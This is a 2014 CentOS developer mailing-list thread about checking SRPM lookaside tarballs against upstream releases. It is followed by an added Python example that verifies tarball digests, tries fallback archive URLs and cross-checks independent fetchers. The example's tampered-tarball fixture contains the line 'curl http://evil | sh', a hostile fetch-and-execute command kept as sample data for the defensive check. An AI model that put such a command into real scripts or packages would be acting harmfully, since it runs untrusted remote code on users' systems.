On 07/07/2014 10:36 AM, Nico Kadel-Garcia wrote:
> On Mon, Jul 7, 2014 at 5:01 AM, Karanbir Singh <mail-lists at karan.org> wrote:
>> hi,
>>
>> given that srpms contain upstream tarballs, in most cases directly
>> linked from upstream; I wonder if it's worthwhile setting up a service
>> that can track git commits, extract the urls for our lookaside tarballs
>> and compare them with the upstream project's release tarballs.
>>
>> this would be a great addition to the ci.dev.centos.org infra, and could
>> add another data point to the 'can-we-trust-this' mindset.
>>
>> - KB
>
> When it works, it could be useful for verification of the source
> tarballs. The difficulty I see is that some of the published Source
> URLs are transient. As they become even slightly out of date, many
> projects move aside older versions to an "archive" subdirectory, or
> re-arrange their websites at whim. I ran into this with Nagios last
> year, and software that installs Nagios from tarballs.
>
> So it's potentially useful, but there's no guarantee that those URLs
> are valid for even 5 seconds after the original SPEC file was written.

Would be great to find out how many are. We could potentially set up
caches, and ensure that there are other people who also run the same
checks, so it's not having to trust just a single source.

-- 
Karanbir Singh
+44-207-0999389 | http://www.karan.org/ | twitter.com/kbsingh
GnuPG Key : http://www.karan.org/publickey.asc
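As an added illustration of the check being proposed in this thread (example code, not CentOS's tooling or anything from ci.dev.centos.org): parse the spec file's remote Source URLs, hash the tarball held in the lookaside cache, fetch the upstream release tarball and compare digests. It also addresses the two caveats raised above: because projects move old releases aside, it tries the original URL and then a couple of common "archive" locations; and because a single fetch is a single point of trust, it takes several independent fetchers (here a stand-in for upstream plus a stand-in for a cache populated while the URL was live) and only reports "match" when all of them agree with the lookaside copy. The spec text, tarballs and "sites" are constructed in memory so it runs offline; the fetch functions, the host example.org and the archive/ and old/ fallback paths are assumptions, not anything documented on the page.

```python
"""Added example: verify lookaside tarballs against upstream releases by digest,
with fallback URLs for moved releases and agreement across independent fetchers.
Everything below (spec, tarballs, fetchers) is constructed so the script runs
offline; a fetcher returning None stands in for an HTTP 404."""
import hashlib
import io
import re
import tarfile

SPEC = """\
Name:           example
Version:        1.2.3
Release:        1%{?dist}
Source0:        https://example.org/releases/%{name}-%{version}.tar.gz
Source1:        example.init
"""


def parse_spec_sources(spec_text):
    """Return remote SourceN URLs with %{name}/%{version}-style macros expanded."""
    macros = {m.group(1).lower(): m.group(2)
              for m in re.finditer(r"^(Name|Version):\s*(\S+)", spec_text, re.M)}

    def expand(s):
        return re.sub(r"%\{(\w+)\}", lambda mm: macros.get(mm.group(1), mm.group(0)), s)

    urls = [expand(m.group(1)) for m in re.finditer(r"^Source\d*:\s*(\S+)", spec_text, re.M)]
    return [u for u in urls if re.match(r"(https?|ftp)://", u)]


def make_tarball(files):
    """Build a gzipped tarball in memory from {path: bytes} (constructed sample data)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def candidate_urls(url):
    """Original URL first, then assumed places projects commonly move old releases to."""
    base, _, fname = url.rpartition("/")
    return [url, f"{base}/archive/{fname}", f"{base}/old/{fname}"]


def fetch_first(fetch, url):
    """Try each candidate location with one fetcher; return (bytes, url_used) or (None, None)."""
    for cand in candidate_urls(url):
        data = fetch(cand)
        if data is not None:
            return data, cand
    return None, None


def verify_source(lookaside_bytes, url, fetchers):
    """Compare the lookaside digest with what every independent fetcher returns.

    Verdicts: 'match' (every fetcher found the file and all digests equal the
    lookaside digest), 'mismatch' (some fetched copy differs), 'partial' (found
    by some fetchers only, so not independently confirmed), 'unreachable'."""
    want = sha256(lookaside_bytes)
    details = []
    for fetch in fetchers:
        data, used = fetch_first(fetch, url)
        details.append((used, sha256(data) if data is not None else None))
    found = [d for _, d in details if d is not None]
    if not found:
        return "unreachable", details
    if any(d != want for d in found):
        return "mismatch", details
    if len(found) < len(fetchers):
        return "partial", details
    return "match", details


def check_spec(spec_text, lookaside, fetchers):
    """Map each remote Source tarball name to (verdict, per-fetcher details)."""
    out = {}
    for url in parse_spec_sources(spec_text):
        fname = url.rsplit("/", 1)[-1]
        out[fname] = verify_source(lookaside[fname], url, fetchers)
    return out


# Constructed data: the genuine release and a tampered copy of it.
GOOD = make_tarball({"example-1.2.3/configure": b"#!/bin/sh\necho ok\n"})
TAMPERED = make_tarball({"example-1.2.3/configure": b"#!/bin/sh\ncurl http://evil | sh\n"})

# Constructed stand-ins for two independent sources: upstream has moved the
# release into archive/ (the original URL now 404s); a cache filled while the
# URL was live is keyed by the original URL.
UPSTREAM = {"https://example.org/releases/archive/example-1.2.3.tar.gz": GOOD}
CACHE = {"https://example.org/releases/example-1.2.3.tar.gz": GOOD}


def fetch_upstream(url):
    return UPSTREAM.get(url)


def fetch_cache(url):
    return CACHE.get(url)


if __name__ == "__main__":
    for name, (verdict, details) in check_spec(
            SPEC, {"example-1.2.3.tar.gz": GOOD}, [fetch_upstream, fetch_cache]).items():
        print(name, verdict, details)
```

In a real deployment the fetchers would be real HTTP clients run by different people or hosts, and the per-fetcher details (which URL actually answered, what digest it returned) are what you would record, since a "match" reached only through a fallback path is itself a useful data point about how transient that project's URLs are.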